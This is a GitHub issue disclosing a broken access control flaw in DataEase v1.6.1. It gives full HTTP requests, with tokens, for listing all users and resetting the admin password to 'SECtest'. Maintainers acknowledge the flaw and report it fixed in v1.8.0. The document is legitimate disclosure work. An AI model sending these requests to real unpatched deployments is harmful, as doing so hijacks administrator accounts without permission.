Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
DataEase 版本 v1.6.1
浏览器版本 Chrome 96.0.4664.110
Bug 描述 I found an Broken Access Control vulnerability An authenticated user can access information about all users and change admin password
Bug 重现步骤(有截图更好)
{"orders":[]} ···
{"userId":1,"newPassword":"SECtest"} ··· now you can use admin/SECtest login
The text was updated successfully, but these errors were encountered:
感谢反馈,确实是有这个问题,我们尽快处理一下
Sorry, something went wrong.
感谢反馈,这个问题将会在下个大版本中修复
v1.8.0 版本已修复,请关注新版本。
youliyuan-fit2cloud
zyyfit
BBchicken-9527
No branches or pull requests
DataEase 版本
v1.6.1
浏览器版本
Chrome 96.0.4664.110
Bug 描述
I found an Broken Access Control vulnerability
An authenticated user can access information about all users and change admin password
Bug 重现步骤(有截图更好)
···
POST /api/user/userGrid/1/10 HTTP/1.1
Host: dataease.fit2cloud.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: application/json, text/plain, /
Content-Type: application/json
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDE4Nzg3MTYsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.m02WO3Uv4xyc2OJztrSOuU7jRBPEmpoj2bGuUr-6nzg
LINK-PWD-TOKEN: null
Connection: close
Referer: https://dataease.fit2cloud.com/
Cookie: request-time-out=10; Authorization=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDE4Nzg3MTYsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.m02WO3Uv4xyc2OJztrSOuU7jRBPEmpoj2bGuUr-6nzg; language=zh_CN
Content-Length: 13
{"orders":[]}

···
···
POST /api/user/adminUpdatePwd HTTP/1.1
Host: dataease.fit2cloud.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: application/json, text/plain, /
Content-Type: application/json
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDE4Nzg3MTYsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.m02WO3Uv4xyc2OJztrSOuU7jRBPEmpoj2bGuUr-6nzg
LINK-PWD-TOKEN: null
Connection: close
Referer: https://dataease.fit2cloud.com/
Cookie: request-time-out=10; Authorization=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDE4Nzg3MTYsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.m02WO3Uv4xyc2OJztrSOuU7jRBPEmpoj2bGuUr-6nzg; language=zh_CN
Content-Length: 36
{"userId":1,"newPassword":"SECtest"}

···
now you can use admin/SECtest login
The text was updated successfully, but these errors were encountered: